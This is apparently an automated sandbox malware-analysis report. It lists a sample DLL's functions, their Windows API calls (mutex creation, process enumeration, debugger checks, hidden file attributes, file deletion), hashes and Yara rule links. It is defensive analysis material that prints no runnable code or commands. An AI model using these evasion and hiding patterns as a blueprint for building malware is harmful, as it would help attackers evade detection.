                                                                                                                            • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                                                            • String ID: %s\%s$open
                                                                                                                            • API String ID: 1843445691-538903891
                                                                                                                            • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                                            • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                                                            • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                                            • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62
                                                                                                                            Function 10015DF0 Relevance: 12.0, APIs: 8, Instructions: 41synchronizationthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                                                            • GetLastError.KERNEL32 ref: 10015E13
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 355449500-0
                                                                                                                            • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                                            • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                                                            • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                                            • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25
                                                                                                                            Function 1000281E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1016 1000281e-1000282b 1018 10002831-10002847 call 10001da0 1016->1018 1019 10002926-1000293f exit 1016->1019 1022 10002915-10002920 Sleep 1018->1022 1023 1000284d-10002865 call 10001e30 1018->1023 1022->1019 1026 10002870-10002874 1023->1026 1027 10002913 1026->1027 1028 1000287a-100028cd Sleep call 10002b60 call 10002da0 call 10001fa0 call 10002cb0 1026->1028 1027->1019 1037 1000290e 1028->1037 1038 100028cf-1000290c call 100029f0 call 10001f10 call 10002960 1028->1038 1037->1027 1040 10002867-1000286d 1037->1040 1038->1027 1040->1026
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                                              • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                                              • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                                                            • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action
                                                                                                                            • API String ID: 4205734914-2913467848
                                                                                                                            • Opcode ID: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                                                            • Instruction ID: 01e91d36be03056c32c976757ddfbd5278b963073b9274932eac54e5bb7bc252
                                                                                                                            • Opcode Fuzzy Hash: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                                                            • Instruction Fuzzy Hash: C321ACB4C01218EBEB14CFA0DC99BEEB770FF45391F504298F4052A28ADB34AB44CB51
                                                                                                                            Function 10012F80 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                                                            • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2185338108-0
                                                                                                                            • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                                            • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                                                            • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                                            • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91
                                                                                                                            Function 10001430 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                                            • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577077003-0
                                                                                                                            • Opcode ID: 3d5d65c2c7976f4b4aae160312df689aeeaf5d43f4e73ea647558735ff45e0be
                                                                                                                            • Instruction ID: 90efd60632e2d823e52567890d799542f586c4bd548bb1fa8c7a4ffe1eb11bac
                                                                                                                            • Opcode Fuzzy Hash: 3d5d65c2c7976f4b4aae160312df689aeeaf5d43f4e73ea647558735ff45e0be
                                                                                                                            • Instruction Fuzzy Hash: 4D2117B1940219EBEB00DF94CC95BEEBBB4FB08740F108529F515AB290DB74AB45CB90
                                                                                                                            Function 10005300 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                            • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1581416325-0
                                                                                                                            • Opcode ID: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                                                            • Instruction ID: 5c88ff171285725a0febf88608a5dc827106f22a602be97f7403975b38e1ce9c
                                                                                                                            • Opcode Fuzzy Hash: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                                                            • Instruction Fuzzy Hash: CA215970A00109ABEB54DF64CC95FAEB774FB04750F108268F51AAB2D0DB70AA85CF94
                                                                                                                            Function 100135C0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Fiopen@std@@U_iobuf@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2284775142-0
                                                                                                                            • Opcode ID: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                                                            • Instruction ID: 655dba523039e8c1ca7b53558f86e7561812b5aaf6b8d3e237c0567069c37aa1
                                                                                                                            • Opcode Fuzzy Hash: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                                                            • Instruction Fuzzy Hash: 08213AB5D04209EFCB04DF98CC81BAEB7B4FB48750F108628E526A7390D735AA50CBA0
                                                                                                                            Function 10012F10 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1100 10012f10-10012f20 1101 10012f63 1100->1101 1102 10012f22-10012f3d call 10012c90 call 10012d20 1100->1102 1104 10012f6a-10012f7c call 10012e40 1101->1104 1110 10012f46-10012f58 fclose 1102->1110 1111 10012f3f 1102->1111 1112 10012f61 1110->1112 1113 10012f5a 1110->1113 1111->1110 1112->1104 1113->1112
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                                                              • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2996004546-0
                                                                                                                            • Opcode ID: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                                                            • Instruction ID: a9d9b0767c6718a53788ed456b677ecfb587c67211e8534dc0a09bbe97dd6693
                                                                                                                            • Opcode Fuzzy Hash: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                                                            • Instruction Fuzzy Hash: C001C9B4A04209EBDB04DF94D996B9DBBB5EF40704F2080A8E9016F391DB71EF95DB81
                                                                                                                            Function 10012400 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2040537880-0
                                                                                                                            • Opcode ID: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                                                            • Instruction ID: b5d0b15e863f3ba68657ea4ca4a108191cbcefbbccc9c59a0a057f78330705e7
                                                                                                                            • Opcode Fuzzy Hash: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                                                            • Instruction Fuzzy Hash: 1FE01A74A00208EFDB08DB94C981B6CBBB5EF85305F6081A8D9066B381D631AE22DB84
                                                                                                                            Function 10005520 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1119 10005520-1000552f DeleteFileA 1120 10005531-10005533 1119->1120 1121 10005537 1119->1121 1122 10005539-1000553a 1120->1122 1121->1122
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            • Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                                                            • Instruction ID: f2f8e3d453fe78865ccc53f7e24a17e21a0dec87b166a9a16b5ac37ce018f2ca
                                                                                                                            • Opcode Fuzzy Hash: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                                                            • Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
                                                                                                                            Function 10005740 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                                                            • Instruction ID: ee6079dce25d93f15e917eacbc87c037c8b3b96b664cac2b0563e90788469a29
                                                                                                                            • Opcode Fuzzy Hash: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                                                            • Instruction Fuzzy Hash: BEB09B3454030C67D5446B51DC59E15771CF7456D1F004450F94D57151CF75FA4447D8

                                                                                                                            Non-executed Functions

                                                                                                                            Function 026218A7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 026218E4
                                                                                                                            • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 0262190A
                                                                                                                            • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 0262193E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 02621990
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0262199B
                                                                                                                            • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 026219B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4292518056-3916222277
                                                                                                                            • Opcode ID: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                                                            • Instruction ID: 5b71386e7e3168237a5d94da3514f91a4c1b9f69fd8725dfff7af8dddcfbaa6e
                                                                                                                            • Opcode Fuzzy Hash: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                                                            • Instruction Fuzzy Hash: 45310575A44218FFE704CF94CC99FAA77B9EB49701F108158FA09AB291C770DB05CB65
                                                                                                                            Function 10001FA0 Relevance: 10.6, APIs: 7, Instructions: 73processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3952204985-0
                                                                                                                            • Opcode ID: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                                                            • Instruction ID: d3f3af0a4508f7e27652e937122bdb82b1fceeeb5c55f2899ae714965ea1cc71
                                                                                                                            • Opcode Fuzzy Hash: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                                                            • Instruction Fuzzy Hash: C3217175900218BBEB50DBE4CC89FEEB7B8EB49741F108198F614A61D5D770AB48CB60
                                                                                                                            Function 10016A5E Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1045392073-0
                                                                                                                            • Opcode ID: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                                                            • Instruction ID: 4823d0db6d89783cfdf2c75b6990e32170b40ac30757b8ad96a9877ce2fabe7b
                                                                                                                            • Opcode Fuzzy Hash: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                                                            • Instruction Fuzzy Hash: 9031C779D052289ADB51DFA4DD89BCDBBB8BF08300F1041AAE40DAB250E7719BC48F45
                                                                                                                            Function 10016BF4 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016C15
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016C1E
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
